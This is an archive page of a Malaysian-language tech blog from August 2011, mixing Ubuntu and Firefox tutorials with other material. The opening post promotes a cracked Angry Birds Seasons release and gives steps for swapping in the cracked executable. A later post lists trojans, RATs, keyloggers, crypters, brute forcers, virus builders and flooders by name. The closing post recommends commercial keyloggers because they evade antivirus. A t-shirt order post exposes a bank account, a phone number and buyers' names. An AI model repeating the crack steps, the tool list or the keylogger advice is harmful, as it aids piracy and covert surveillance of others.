27 August 2011

Angry Birds Seasons v1.5.1 For PC Full Cracked (Mediafire)


Angry Birds Seasons v1.5.1 For PC Full Cracked (Mediafire)

Release Name: Angry Birds Seasons
Release Version: v1.5.1
Release Group: ErES
Supplier: Contact
Release Type: Cracked
Operating System: Windows
Release Date: 21/08/11
Uploaded To: Mediafire


Amacam? Teruja tak? Haha.. Mesti la! Baru je keluar dah ada yang buat versi crack. Terbaikkk..
Mr.Hac sendiri belum sempat nak main Angry Birds Seasons ni sebab baru teringat nak cari. Jadi jangan tunggu lama-lama la, jom terus download dan main sampai habis!


Klik ---> Angry Birds Seasons v1.5.1 For PC Full Cracked


Panduan Pemasangan:

1. Pasang seperti biasa, tetapi jangan main dulu!

2. Salin, tampal, dan gantikan (copy-paste and replace) fail 'AngryBirdsSeasons.exe' ke dalam folder
C: \ Program Files \ Rovio \ Angry Birds Seasons \

3. Mulakan program Angry Birds Season dan daftarkan dengan apa jua serial key. Maknanya apa jua yang anda fikirkan sesuai! Tak perlu guna keygen! Kalau rasa-rasa 12345678901 tu key yang best, boleh cuba la! Hahah! Chow Sin chiii!!

Pemain Video Terbaik Untuk Ubuntu


Anda tidak puas dengan fungsi pemain video lalai (default video/movie player) dalam Ubuntu?
Mahukan pemain pelbagai fungsi, serta menyokong lebih banyak codec tanpa perlu memuat turun codecnya melalui internet? Ya.. Mr.Hac ada jawapan untuk soalan itu..

Namun sila ambil perhatian bahawa ini merupakan pendapat peribadi Mr.Hac. Ini bukan 'universal opinion' atau pendapat kebanyakan orang. Kerana Mr.Hac telah pun membuat kajian dan pemerhatian sendiri, dalam pelbagai blog, tak lupa juga forum, tidak ada satu pun yang menyebut UMPlayer adalah yang terbaik!

Mr.Hac telah menggunakan UMPlayer sejak dari dalam Windows lagi dan boleh dikatakan ia sememangnya terbaik! Kerana apa? Kerana ia bersaiz kompak, padat dengan codec yang menyokong pelbagai jenis format video, malahan pemain video lalai Ubuntu, Totem Movie Player juga kadangkala perlu memuat turun codec dari internet untuk memainkan video yang mempunyai codec yang 'aneh'. Tetapi UMPlayer dapat memainkannya dengan cemerlang tanpa perlukan codec tambahan.


Selain itu ia juga akan 'mengingati' apa yang telah dimainkan oleh anda. Sekiranya anda tertutup secara tidak sengaja, anda cuma perlu buka kembali. Ia akan mengingati masa video tersebut dimainkan, sarikatanya, had bunyi (volume) dan lain-lain lagi! Tak cukup dengan itu, ia sangat pantas. Maka ia amat sesuai dijadikan pemain video lalai dalam Ubuntu menggantikan Totem Movie Player.

Untuk memuat turun UMPlayer, klik di sini -> UMPlayer For Ubuntu/Debian

Anda hanya perlu klik dua kali pada fail .deb dan ia akan dipasang oleh Ubuntu Software Center.
Cubalah dan berikan pendapat anda pula!

P/S: Dalam entri ini Mr.Hac mampu berikan ulasan satu pemain video sahaja. Kalau buat banyak-banyak nanti hilang tumpuan pula! Jangan nyahpasang (uninstall) Totem Movie Player kerana mungkin ada sesetengah video yang tidak dapat dimainkan dengan baik oleh UMPlayer, sebaliknya pula yang berlaku kepada Totem Movie Player! Biarkan kedua-duanya ada dalam komputer anda, itu lebih baik. Sekurang-kurangnya anda ada alternatif apabila salah satu nanti 'buat hal'.

26 August 2011

Senarai Tools Dan Virus Paling Berbahaya 2011


Salam...


Hari ini Analyzer nak buat 1 entri pendek untuk perkongsian bersama.Lagi pun raya da nak dekatkan?Dikesempatan ini Analyzer ingin mengucapkan selamat hari raya aidilfitri kepada semua rakan-rakan terutama Mr.Hac dan Janjang.Analyzer juga ingin memohon ampun dan maaf jika ada silap kan salah pada kalian semua.Berhati-hatilah semasa pulang ke kampung halaman.


Ini adalah senarai Tools dan Virus yang paling digemari pada tahun 2011.Ada juga virus dan tools yang Analyzer sendiri tidak pernah dengar.Insyallah Analyzer akan mengulas lebih lanjut tentang tools-tools dan virus di bawah...






Trojan Horses
-Yuri RAT v1.2
-MofoTro v1.7 BETA
-Charon
-Beast v2.0.7
-Omerta v1.3
-Theef v2.10
-Combined Forces R.A.T
-ProRat v1.9 Fix2


Keyloggers
-Elite Keylogger v1.0
-SKL v0.1
-KeySpy v2.0
-A++++
-Curiosity
-Keylogger
-KeyCopy


Binders
-Daemon Crypt Public v2
-NT Packer v2.1
-EES binder v1.0
-File Injector v3
-Bytes Adder
-FreshBind v2.01
-YAB v2.01
-NakedBind v1.0
-Amok Joiner


WebHacks/WordLists
Brute Forcers
-Munga Bunga 's Official
-Brutus - Authentication Engine Test 2
-wwwHack v1.946
-FTP Brute Hacker
-FTP Brute Forcer.tar.gz - Unix
-Wbrute.tar.gz - Unix
-Shadow Scanner-Brute Forcer
-Hackers Utility v1.5
-POP3 brute forcer.tar.gz - Unix


CGI-Bug Scanners
-NStealth HTTP Security Scanner v5.8
-Attack Toolkit v4.1 & source code included
-Scanarator
-Legion NetBios Scanner v2.1
-NetView v1.0
-CGI Vulnerability Scan
-CGI Scanner v4.0
-VoidEye CGI scanner


Viruses
-Hippi virus
-Sasser
-W32. Blaster .Worm
-Midnight Massacre
-00001
-Nimda
-Loveletter virus
-Happy '99
-MXZ


Virus Builders
-DR VBS
-VBSwg 2 beta - Virus builder
-p0ke's WormGen 2.0
-RESIDUO - DoS Virus


MSN Hacks & Bots
-HoaX Toolbox 1.1
-MSN Extreme 3.0
-MessenPass v1.06
-Advanced Blood Scroller
-Nudge Madness
-Advanced Instant Messengers Password Recovery
-Contact Spy
-Msn Explosion
-Encrypted Messenger


Port & IP Scanners
-Blues Port Scanner
-ProPort v2.2
-SuperScan v3.0
-Net Scan Tools v4.2
-LanSpy v2.0
-Trojan Hunter v1.5
-SuperScan v4.0
-Neotrace PRO v3.25 trial&crack


Nukers And Flooders
-Rocket v1.0
-RPCNuke v1.0
-Panther Mode1 - 56k
-Panther Mode2 - ISDN
-Final Fortune v2.4
-Battle Pong - Technophoria
-Assault v1.0
-ICMP Nuker
-CLICK v2.2


Salam Tulus Ikhlas Dari Alif Ali a.k.a Analyzer.Selamat Hari Raya Aidilfitri Maaf Zahir Dan Batin


Visit Us At https://www.facebook.com/MyHackersAreHere
Copyright © 2010-2011 Analyzer Programmer™, All Rights Reserved.

Update : Tempahan Baju T Ubuntu





Kemas kini setakat 26/8/2011:

Telah dimasukkan logo Ubuntu di belakang baju!

Senarai nama tempahan

1. deensokmo: 3 helai (M). Bayaran RM90
2. nik mohd nazri: 1 helai (XL) Bayaran RM42
3. william92: 6 helai (S, M, M, M, L, XL) Bayaran RM192
4. Mohd Aidy: 1 helai (M)
5. suhaimi hashim: 1 helai (M)
6. Mat Yamin Ismail: 2 helai (XL, XL)
7. khai a 9000khai: 1 helai (M)
8. Mohd Nazmi: 1 helai (M atau XXL), sila emel kepada saya mana 1 saiz?
9. Ahmad Nasir: 2 helai (XXL, XXL
10. Syareez: 1 helai (M)
11. Mohamad Suhaimi: 1 Helai (XL)
12. Shim: 1 helai (M) Bayaran RM36
13 Mohamad Syafiq Shairan: 2 helai (S, XL)
14. Fadhil Hussin: 2 helai (S, M) Bayaran RM66
15. Sazli: 1 helai (XXL) Bayaran RM30
16. Redhudeen?

Jumlah: 26 helai

Kita kena kumpul sehingga 30 helai utk dapatkan harga RM30 sehelai.. (Pembetulan: bukan 20 helai seperti yang diwar-warkan baru-baru ini)

Sila semak betul-betul alamat anda supaya barang yang di hantar tidak tiba ke tempat lain dan butiran lain seperti nama penuh, nombor telefon, kuantiti serta saiz baju S, M, L, XL, XXL.

Tempahan masih dibuka dan dilanjutkan sehingga 8/9/2011 atau sehingga diberitahu kemudian. Harga RM30 per helai tidak termasuk kos penghantaran. Baju akan dicetak selepas Raya ini, harap maklum! Kena bersabar sikit.

Pengumuman!
Kepada mereka yang telah membuat tempahan bolehlah menjelaskan bayaran sepenuhnya seperti jumlah berikut:
Kuantiti 1 helai = RM30
Kos ambil sendiri (self collect) = tiada cas
Kos penghantaran Semenanjung = RM6
Kos Penghantaran Sabah/Sarawak = RM12

Pengiraan jumlah bayaran di mana X adalah jumlahnya:
X = (Kuantiti X RM30) + Kos penghantaran

Bayaran hendaklah dibuat ke akaun:

Nama Bank: Maybank Berhad
Nama pemilik akaun: Kamarudin bin Mahmood
No akaun: 112473071991

Setelah bayaran penuh dibuat, sila emelkan kepada deensokmo@gmail.com
Resit/pengesahan maklumat transaksi tersebut seperti No. rujukan resit, nama anda, Nombor telefon, jumlah bayaran, tarikh dan masa. Kegagalan berbuat demikian akan menimbulkan kesukaran untuk dikemaskini status pembayaran anda dan kelewatan mencetak baju.

Sebarang pertanyaan berhubung pembayaran dan lain-lain boleh hubungi saya 019-2263574 atau sila emelkan kepada saya deensokmo@gmail.com


Entri ini telah dicopy-paste dan DIEDIT secara berhemah dari : Cadangan Membuat Baju Ubuntu

Tunggu apa lagi? Cepat tempah sekarang! Tapi jangan setakat tempah je.. Bayar sekali la haaa...

Mengatasi Masalah Kemaskini Versi Firefox Dalam Ubuntu


Pernahkah anda (yang menggunakan Ubuntu) mengalami masalah untuk mengemaskini versi Firefox? Pelbagai cara telah dicuba seperti melalui terminal dengan sumber yang sah lagi diyakini iaitu PPA (Personal Package Archive, thanks to fikri.my), atau melalui Ubuntu Software Center tetapi semuanya menjadi jalan buntu apabila versinya masih sama, tidak berubah. Pernahkah anda mengalaminya?
Untuk mengetahui kenapa, rujuk -> maketecheasier.com
Tapi bagaimana pula jika anda menggunakan versi Ubuntu terkini, yang sepatutnya digandingkan bersama versi Firefox terkini, agak menjengkelkan bukan apabila anda masih lagi 'tersangkut' pada versi lama..

Jangan dilema! Jom tengok cara Mr.Hac mengatasi masalah ini dengan mudah. Cara Mr.Hac ni tak perlu banyak bermain dengan Terminal. Cukup sekadar buka sekali sahaja. Oh.. Ok.. Sebelum terlupa, buat sesiapa yang masih belum mencuba Ubuntu, atau buat mereka yang masih tertanya-tanya apa itu Ubuntu, anda boleh baca entri Mr.Hac tentang Ubuntu di sini -> Apa Itu Ubuntu?


Mengatasi Masalah Kemaskini Versi Firefox Dalam Ubuntu

1. Pertama sekali, muat turun fail Firefox versi terkini di sini -> mozilla.org

2. Klik kanan pada fail firefox-6.0.tar.bz2, pilih Extract Here dan akan terlihat satu folder berjudul 'firefox'. Namakan semula (rename) ia kepada firefox-6.0
Sebelum Mr.Hac terlupa, anda hanya akan dapat memuat turun fail Firefox versi tar.bz2 hanya apabila anda berada dalam Ubuntu. Kalau anda berada dalam Windows, tak pasti pula bagaimana caranya.
Boleh Google lah kalau rajin!

3. Buka Terminal, taipkan baris perintah sudo nautilus untuk membuka file browser anda dengan keintiman 'keistimewaan' root atau 'super user' dan masukkan kata laluan apabila diminta. Dalam Windows, root juga dikenali sebagai 'Administrator'. Anda mahu Terminal anda kelihatan Transparent seperti di bawah?
Rujuk -> Modifikasi : Jadikan Terminal Ubuntu Anda Transparent


4. Salin folder firefox-6.0 tadi ke dalam direktori File System -> usr -> lib

5. Buka folder firefox-6.0 dan cari satu fail bernama 'firefox'. Klik kanan padanya dan pilih 'Make Link'. Ia akan mencipta satu fail pintas dengan nama 'Link to firefox'.

6. Potong dan tampal (cut and paste) fail ini ke dalam direktori File System -> usr -> bin

7. Terdapat satu fail dengan nama 'firefox'. Namakan semula ia kepada 'firefox-old'. Sekiranya tiada, biarkan.

8. Selepas itu, namakan semula fail 'Link to firefox' kepada 'firefox'.

9. Tutup semua tetingkap yang berkaitan dengan Firefox. Cuba buka semula Firefox anda. Wal-lah! Sudah update!

10. Cuba lakukan navigasi ke laman-laman web yang digemari. Sekiranya tiada masalah, maka anda boleh terus gunakan Firefox versi terkini anda itu!

ATAU

Anda boleh cuba dengan cara menempatkan folder firefox-6.0.tar.bz2 ke dalam 'Home Folder' anda, salin dan tampal baris perintah berikut ke dalam Terminal, tekan Enter lalu masukkan kata laluan apabila diminta:

if [[ ! -f /usr/bin/firefox ]]; then sudo apt-get update && sudo apt-get install firefox; fi && if [[ -e ~/.mozilla ]]; then cp -R ~/.mozilla ~/.mozilla.backup; fi && sudo tar -jxvf firefox-6.0.tar.bz2 -C /opt && rm firefox-6.0.tar.bz2 && sudo mv /opt/firefox/plugins /opt/firefox/plugins.backup && sudo ln -s /usr/lib/xulrunner-addons/plugins /opt/firefox/plugins && sudo dpkg-divert --divert /usr/bin/firefox.ubuntu --rename /usr/bin/firefox && sudo ln -s /opt/firefox/firefox /usr/bin/firefox

Cara yang ini Mr.Hac belum pernah cuba lagi kerana cara yang pertama dah cukup sempurna! Kalau nak cuba juga boleh rujuk -> yomahol.blogspot.com
Nampak tak dalam baris perintah tu ada nombor versi Firefox (6.0), maka untuk mengemaskini versi seterusnya hanya perlu tukarkan nombor versi itu dengan syarat anda perlu memuat turun fail versi terkini terlebih dahulu. Jika anda mahu mencuba nasib, anda boleh cuba kemaskini versi Firefox kepada yang terkini melalui 'Update Manager', melalui Terminal atau boleh juga melalui Ubuntu Software Center. Apabila semua cara menemui jalan buntu, maka eloklah ikut cara Mr.Hac ni. Ok.. Good luck! Selamat mencuba!

25 August 2011

Selamat Menyambut Hari Raya Aidilfitri : Maaf Zahir Batin


Alhamdulillah. Segala puji bagi Tuhan Rabbul Izzati, kerana dengan limpah rahmatnya, masih lagi saya, Arya Putra a.k.a Mr.Hac menulis lagi di sini. Sekembalinya Mr.Hac, tidak lain dan tidak bukan Mr.Hac nak ucapkan selamat menyambut Hari Raya Aidilfitri, yang bakal menjelang beberapa hari saja lagi. Mungkin ada yang sudah pulang ke kampung halaman, mungkin ada juga yang masih menunggu 'jualan raya' untuk membeli-belah dengan keluarga masing-masing. Apapun, satu saja pesanan Mr.Hac, pandulah dengan cermat, ingatlah orang tersayang. Perghhhh.. Syahdunya ayat ni!


Yup. Malam tu memang pantas. Segalanya berlaku dalam sekelip mata. Bukan salah sesiapa, tetapi lumpur di jalan menjadi punca. Motorsikal yang ditunggangi Mr.Hac tergelincir dan terbabas, manakala Mr.Hac sendiri jatuh tersembam dan bergolek. Sakit tu!
Hampir saja ia meragut kesucian semangat Mr.Hac daripada menulis kembali di blog ini!
Paling menyakitkan, bila kesemua anggota-anggota WUDHUK terlibat dengan LUKA. Meskipun tak parah, tapi dari mulut (bibir) hingga ke kaki, ada saja anggota yang mengalami luka-luka. Ini menyukarkan Mr.Hac untuk mandi dan mengambil wudhuk! Sakit peritnya Tuhan sahaja yang lebih mengetahui. Sebab tu Mr.Hac harap, kepada mereka yang ingin pulang beraya di kampung halaman, pandulah dengan berhati-hati dan kalau boleh, ELAKKAN KEMALANGAN.


Kepada mereka yang mendoakan Mr.Hac, Allah sahaja yang dapat membalas budi baik anda semua.
Berkat doa anda, luka ini semakin pulih (pantas sekali!)
Sekali lagi Mr.Hac ingin mengucapkan selamat berbuka tengahari
SELAMAT HARI RAYA AIDILFITRI, MAAF ZAHIR DAN BATIN.
Kalau Mr.Hac ada terkasar bahasa, ampun maaf jualah yang dipinta!
Hasta pronto evelibody! Em koi sai aaa!! Haha!

23 August 2011

Encrypted Google Search Di Web Browser


Agak lama juga saya tidak menjenguk blog ini kerana kesibukan kerja dan hal-hal peribadi saya.
Puasa pun dah nak sampai ke penghujung.Lagu raya pun da kedengaran dah hehe..
Minta maaf banyak-banyak pada semua terutama pada Mr.Hac sebab da lama tak post entry.
Apa yang terjadi pada Mr.Hac saya sangat simpati.Harap-harap Mr.Hac akan kembali sihat sepenuhnya seperti sedia kala.


Google dah pun mengeluarkan search engine yang selamat yaitu Encrypted Google Search 
Mulai sekarang anda boleh melakukan pencarian Google dengan menggunakan Encrypted Google Search bagi mengelak segala data anda dicuri didalam network dengan menggunakan SSL session(Secure Socket Layer).

Anda juga boleh membuat default secure search ni pada setiap web browser.Setiap web browser mempunyai cara yang berlainan jika mahu menetapkan default secure search ini.


Cara nak membuatnya pada Mozilla Firefox :

1.Anda perlu download dan install firefox addon Add to Search Bar dahulu.

2. Selepas install,restart firefox.

3. Sekarang buka https://www.google.com di browser.Klik kanan dimana-mana search box dan pilih Add to Search Bar.

4. Satu tetingkap kecil akan muncul,klik key word dan taip Secure Google.klik ok.

5. Sekarang encrypted secure google telah ditambah di browser.Untuk menjadikan ia sebagai default,klik pada anak panah kebawah di browser search bar diatas dan pilh Manage Search Engine...

6. Pilih Secure Google di list dan klik button Move Up.klik sehingga ia berada di kedudukan teratas.kemudian klik ok.Selesai...


 Cara nak membuatnya pada Google Chrome :(Lebih mudah dan tidak perlu download apa-apa.)

1. klik pada Tool menu dihujung kanan atas browser(gambar spanar),pilih Options.

2. klik Basic tab,klik pada Manage button di Default Search Section.

3.Pada Serch Engine windows klik Add,masukkan butiran ini :
Name : Secure google
Keyword : www.google.com

4. klik OK,sekarang pilih Secure Google pada list dan klik Make Default.Selesai sudah...

Pada Browse Tab,anda akan lihat address anda akan bertukar kepada "https" seperti ini :



Kemungkinan ada diantara pengguna tidak berjaya menjadikan default search engine ini pada firefox diatas sebab-sebab tertentu seperti version firefox dan juga addon-addon yang telah di install.

Apa-apa pun di harap cuba dulu dan kemudian jika ada soalan dan pandangan bolehlah di tulis diruang komen dibawah.Kita kongsi bersama tentang ini ok.

Selamat Mencuba!

22 August 2011

Minta Maaf Semua : SAYA KEMALANGAN


Salam. Buat sementara waktu ni Mr.Hac tak dapat nak update blog. Mr.Hac baru pulang dari hospital kerana kemalangan. Doakan Mr.Hac sembuh. Terima kasih kepada semua.

Mungkin Mr.Hac akan mengambil masa yang lama untuk sembuh. Kepada para penulis jemputan, teruskan menulis. Gantilah saya semasa ketiadaan saya. Apa boleh buat. Nasib malang tidak berbau.

21 August 2011

Apa Itu Ubuntu?


Entri ini merupakan panduan asas untuk sesiapa yang tertanya-tanya tentang apa itu Ubuntu?
Mr.Hac tampilkan entri ini kerana pada entri-entri yang lepas, yang berkaitan dengan Ubuntu khususnya dan Linux amnya tidak mendapat sambutan dari para pembaca (tengok dari stats dan komen, sangat sedikit!)
Lagi pula sudah ada pembaca yang bertanya "Mr.Hac, Ubuntu ni sebenarnya apa??"
Apakah yang dimaksudkan dengan Ubuntu? Sebutannya ooo-boon-too bukan youuu-boon-too..
Tak percaya? Rujuk -> How To Pronounce "Ubuntu"

Perisian Bebas atau Sumber Terbuka

Pada lewat tahun 1980-an, menjadi kebiasaan bagi peminat atau pengatur cara program komputer untuk berkongsi perisian serta kod sumbernya. Ketika itu, sistem operasi (OS) Unix banyak diguna pakai oleh industri dan akademik. Bagaimanapun, OS ini menjadi terlalu ketat dengan paten sehingga menghalang pengguna komputer bebas untuk menukar kod-kod programnya.
Richard Stallman, seorang saintis komputer melahirkan projek untuk mencipta klon kepada
OS Unix yang dipanggil GNU - akronim bagi “GNU's Not Unix” yang mana mengamalkan dasar “kebebasan perisian”. Falsafah Perisian Bebas (Free software) atau Sumber Terbuka membenarkan pengguna mendapatkan kod sumber, berkongsi dan melakukan perubahan tanpa sebarang halangan. Richard percaya konsep ini lebih menyihatkan serta lebih natural dengan sifat manusia. Perisian Bebas juga lebih fleksibel untuk disesuaikan mengikut kehendak dan keadaan pengguna.

Apa Itu Linux dan Apa Itu Kernel?

Apabila GNU berkembang, banyak aplikasi UNIX telah pun diklon dan secara praktikalnya
boleh dikatakan terdapat jumlah perisian yang mencukupi untuk dijadikan suatu OS yang
baru akan tetapi GNU kekurangan satu item penting yang dipanggil kernel.

Kernel merupakan jantung kepada mana-mana OS yang melakukan fungsi asas seperti
menjadi “orang tengah” dalam komunikasi antara perisian dan perkakasan.


Pada tahun 1991, seorang pelajar Universiti Helsinki, Linus Benedict Torvalds melakukan
projek peribadi untuk menghasilkan kernel. Kernel ini pada asalnya ingin dinamakan Freax
oleh Linus walau bagaimanapun, rakannya, Ari Lemmke yang menjaga server untuk
memuat turun kernel ini menamakan direktori Linus sebagai Linux. Sejak itu, Linux diguna
sebagai nama rasmi kernel ini. Keadaan bertambah rancak apabila Linus mengeluarkan versi kernelnya sebagai Perisian Bebas yang mana mendorong lebih banyak penyumbang kod menyertai projek ini dan seterusnya mematangkan kernel ini untuk digunakan secara massa.
Akhirnya, Linux digabungkan dengan aplikasi-aplikasi GNU menjadikannya sebuah OS
yang lengkap yang dipanggil GNU/Linux. Tetapi ramai pengguna komputer berasa
janggal memanggilnya GNU/Linux kerana tulisannya yang panjang serta pelik dari segi
bunyi. Maka kebanyakkan orang hanya menyebutnya Linux.

Apa Itu Distribution?

Oleh sebab, Linux bersifat bebas maka sesiapa sahaja boleh menyunting kod-kodnya dan menghasilkan OS baru berasaskan Linux. Ini menyebabkan pelbagai variasi Linux wujud diluar sana. Variasi-variasi inilah yang disebut sebagai distribution atau dalam singkatannya sebagai distro. Antara distro Linux yang terkenal termasuklah Ubuntu, Debian, Red Hat, Fedora, openSUSE dan pelbagai lagi.

Apa Itu Ubuntu?

Ubuntu merupakan salah satu sistem operasi Linux yang paling popular di kalangan pengguna desktop. Pertama kali dikeluarkan pada 20 Oktober 2004. Ia menekankan pada kepenggunaan dan keselamatan. Ubuntu diasaskan oleh Mark Shuttleworth, seorang ahli perniagaan dari Afrika Selatan. Perkataan Ubuntu berasal dari puak Zulu, Afrika yang bermaksud “kemanusiaan kepada yang lain” atau “humanity towards others”.

Sokongan

Ubuntu mendapat sokongan pembangunannya dari syarikat Canonical Ltd. dan juga ahli komunitinya yang ramai. Ubuntu juga akan mengeluarkan versi baru setiap enam (6) bulan iaitu pada bulan April dan Oktober tiap-tiap tahun. Kemaskini dan naik taraf Ubuntu adalah percuma. Terdapat dua jenis sokongan bagi versi Ubuntu iaitu versi Long Term Support (LTS) dan bukan LTS.

Versi dan Tempoh Sokongan

Long Term Support (LTS) ---> Tiga (3) tahun untuk Desktop Edition, Lima (5) tahun untuk Server Edition.
Biasa atau bukan LTS ---> 18 bulan untuk Desktop Edition dan Server Edition.

Versi Keluaran

Ubuntu versi baru akan dikeluarkan pada setiap enam (6) bulan yang mana nombor versi itu dipilih mengikut tahun dan bulan ia dikeluarkan. Ia juga akan menggunakan nama kod (codename) bagi setiap versinya. Nama ini dipilih dalam dua perkataan dan menggunakan huruf permulaan yang serupa pada kedua-dua perkataan.

Keperluan Minimum Ubuntu

Sebelum anda melakukan proses pemasangan Ubuntu, pastikan komputer anda mempunyai spesifikasi minimum seperti :

CPU 700 MHz
RAM 256 MB
Ruang Cakera Keras 4 GB


SUMBER/KREDIT : Buku Panduan Asas Ubuntu 10.04 LTS Desktop Edition

20 August 2011

Modifikasi : Jadikan Terminal Ubuntu Anda Transparent


Bosan dengan skema warna Terminal anda yang mengikut kepada tema Ubuntu? Mahu melakukan sedikit modifikasi ringkas yang dapat menjadikannya lebih 'ceria'? Atau sekurang-kurangnya lain dari yang lain, tak sama dengan 'standard setting'? (dah macam budak motor pulak main modification ni)

Kalau jawapan anda ya, jom kita tengok contoh gambar Terminal Ubuntu Mr.Hac di bawah:





Cara Menjadikan Terminal Ubuntu Kepada Transparent (Ubuntu 11.04):

1. Mula-mula sekali, buka Terminal dahulu.

2. Lihat pada bahagian atas tu, ada senarai menu kan? Klik pada Edit -> Profiles... -> Edit
atau klik Edit -> Profile Preferences

3. Selepas itu pergi kepada tab Colors dan hilangkan tanda (un-tick) Use colors from system theme.

4. Klik Text color dan ubah kepada warna putih, kod warnanya ialah #FFFFFF

5. Klik Background color dan ubah kepada warna hitam, kod warnanya ialah #000000 atau #111111

4. Kemudian pergi ke tab Background dan tandakan (tick) pada Transparent background. Anda boleh gerakkan slider dan ubah transparency ikut kemahuan anda sama ada mahu betul-betul transparent atau sedikit gelap.

5. Dah selesai. Anda boleh close untuk menggunakan tetapan baharu untuk Terminal anda! Perlu diingatkan jika anda menggunakan Ubuntu versi terdahulu, maka nama tetapan dalam Terminal ini mungkin berlainan, tetapi 'isinya' serupa sahaja.

Tips: Sebenarnya skema warna Terminal ni anda boleh ubah ikut sesuka hati. Tidak semestinya nak kena ikut tutorial ni 100%. Maknanya ikut kreativiti masing-masing la. Amacam? Dah cun kan Terminal Ubuntu bila buat macam ni? Nak belajar command pun senang, tak perlu minimize Terminal. Boleh terus baca command di belakangnya!

Tempahan Baju T Ubuntu Dibuka!


Berita baik kepada semua peminat-peminat Ubuntu, anda boleh menempah baju t Ubuntu yang akan dicetak tidak lama lagi. Buat permulaan, baju t tersebut akan dibuka kepada 10 tempahan sahaja!
Anggaran harga baju dalam RM25-35. Nanti Mr.Hac update lagi dengan bro deensokmo. Tempah dulu, bayar kemudian sebab bro deensokmo nak kira berapa jumlah anggaran tempahan sehingga 20 helai kalau boleh untuk permulaan. Cukup 10 atau lebih (hingga 20 helai tempahan), design baju akan dihantar untuk dicetak. Setakat ni dah ada orang volunteer untuk jadi pencetak baju dengan harga yang murah iaitu bawah RM25! Menarik bukan? Jadi cepat-cepat buat tempahan melalui e-mel deensokmo@gmail.com
Sila e-melkan nama penuh, alamat, no telefon, saiz baju dan kuantiti.
Design baju (asas, belum final lagi) adalah seperti di bawah:


Baju T Kosong (plain t-shirt)



Design Baju Ubuntu


Mr.Hac: Dah tempah satu weh! hehe..

19 August 2011

12 Pautan Google Sitelinks Untuk My Hackers Are Here


Asalnya tidak menjangka akan mendapat 12 Google Sitelinks untuk blog ini. Tetapi selepas membaca entri di blog Anarm.net dan juga di blog Amanz.my, Mr.Hac tergerak hati untuk memeriksa sendiri Google Sitelinks di blog ini sama ada sudah dikemaskini oleh Google atau tidak, dan hasilnya...

12 Google Sitelinks (Expanded and Improved) untuk My Hackers Are Here!


Mr.Hac tidak pasti apa kriteria blog ini sehingga memperoleh sebanyak itu. Nampaknya blog Mr.Hac sudah setanding dengan blog-blog 'old-timer' yang lain. Alhamdulillah..
Sila Google dengan kata kunci 'my hackers are here' untuk melihatnya sendiri.

18 August 2011

Pasang Kernel Linux 3.0.2 Pada Ubuntu


Mr.Hac dapat tahu Kernel untuk Linux versi terbaru iaitu 3.0.2 (stable release) telah pun siap untuk dimuat turun. Apa itu Kernel? Nantilah dalam entri yang lain Mr.Hac akan cuba cerita sikit-sikit tentang Kernel dan Linux amnya.


Rujuk -> Softpedia untuk membaca apa penambahbaikan pada Kernel versi ini

Rujuk > Kernel Index untuk melihat kesemua senarai Kernel

Muat Turun -> Kernel 3.0.2 Oneiric

Mr.Hac telah mencuba sendiri Kernel terbaru ini pada Ubuntu 11.04, dan apa yang boleh Mr.Hac katakan ialah ia lebih pantas, lebih smooth, dan menjimatkan penggunaan elektrik (bateri).


Cara Pasang Kernel Linux 3.0.2 Pada Ubuntu

Untuk Pengguna 32-bit

linux-headers_all.deb

linux-headers-generic_i386.deb

linux-image-generic_i386.deb

Untuk Pengguna 64-bit

linux-headers_all.deb

linux-headers-generic_amd64

linux-image-generic_amd64

Sebelum memasang Kernel ini, sila pastikan ia berada di dalam direktori Home/Nama PC Anda
Sebagai contoh jika nama PC Mr.Hac ialah putra, maka fail-fail di atas
harus berada dalam direktori Home/putra <- Wajib ni. Mr.Hac dah cuba pasang secara bersepah-sepah, sekejap di desktop, sekejap dalam folder 'Downloads', memang tak berjaya. Tak perlu letak dalam folder, tapi biarkan ia 'bersepah' dalam direktori Home/Nama PC Anda itu.

Kemudian buka Terminal, taipkan baris perintah di bawah:

sudo dpkg -i 'nama fail yang ingin dipasang'

Contoh:

sudo dpkg -i linux-headers-3.0.2-030002_3.0.2-030002.201108161204_all.deb

Pasang mengikut susunan yang telah Mr.Hac aturkan di atas. Setelah selesai, Restart PC anda dan anda akan dapat melihat Kernel baru tersebut siap untuk digunakan. Jika anda mahu membersihkan Kernel yang lama setelah berpuas hati dengan Kernel versi terbaru ini, anda boleh gunakan Ubuntu-Tweak.
Rujuk -> Deensokmo

Anda boleh menyemak kembali versi Kernel yang sedang anda gunakan dengan menaip baris perintah berikut dalam Terminal:

uname -r

P/S: Sebarang kekurangan dalam entri ini haraplah dimaafkan.

Tengok versi Kernel Mr.Hac yang telah dikemaskini. Jangan jaki ya.. hehe..




UPDATE: Kernel versi 3.0.3 stable release sudah keluar! yeah!

Seperkara lagi, JANGAN sesekali pasang KERNEL BARU jika anda telah pernah memasang pemacu tambahan (Proprietary Drivers). Jika pernah, sila nyahpasang terlebih dahulu (Uninstall), kemudian barulah anda pasang kernel baru tersebut.

Public Keylogger vs Industrial Keylogger


Mr.Hac telah melakukan beberapa kajian terhadap 'tingkah laku' public/home keylogger dan industrial/commercial keylogger. Mr.Hac dapat merumuskan bahawa jika anda benar-benar mahu selamat dari sebarang jenis 'trojan di dalam trojan' yang gagal dikesan oleh antivirus anda, adalah lebih baik anda membeli keylogger (industrial) yang sah dari pembangunnya.

Kenapa? Ini adalah kerana pada kebanyakan public keylogger, ianya telah dibuat oleh Elite Hackers yang mahir atau pakar dalam bahasa pengaturcaraan. Mereka bukanlah bodoh, mahu memberi tanpa menerima apa-apa balasan. Jadi keylogger yang dihasilkan sememangnya bukan janji, tapi pasti mengandungi satu lagi 'server' keylogger yang telah 'disuntik' ke dalamnya. Tujuan? Mudah dan ringkas untuk difahami.. Hanya untuk mendapatkan maklumat sulit dan peribadi penggunanya. Bayangkan jika pengguna tersebut menaip maklumat log masuk dalam laman web bank, Paypal, Nuffnang... errr? Sudah tentu dengan mudah akaun mereka akan digodam. Ya.. Bukan janji lagi tapi pasti. (Hati-hati dengan fail yang bernama 'stub.exe' kerana selalunya ia adalah fail yang akan menjalankan keylogger secara senyap selepas perisian yang berhubung dengannya dijalankan)


Berbeza dengan industrial keylogger yang dijual secara umum di internet, ia jauh lebih selamat, dikemaskini secara konsisten oleh para pembangunnya (dengan tujuan untuk melepasi pengesanan antivirus), serta lebih canggih dengan pelbagai ciri yang sangat lengkap. Walaupun kadangkala harganya agak 'tidak munasabah', itu jauh lebih baik dari mendedahkan akaun anda kepada risiko penggodam. Mana mahu? Hilang RM100 kerana nak mencuba keylogger dari syarikat yang dipercayai intergritinya, atau hilang beribu-ribu wang di bank akibat menggunakan public keylogger?

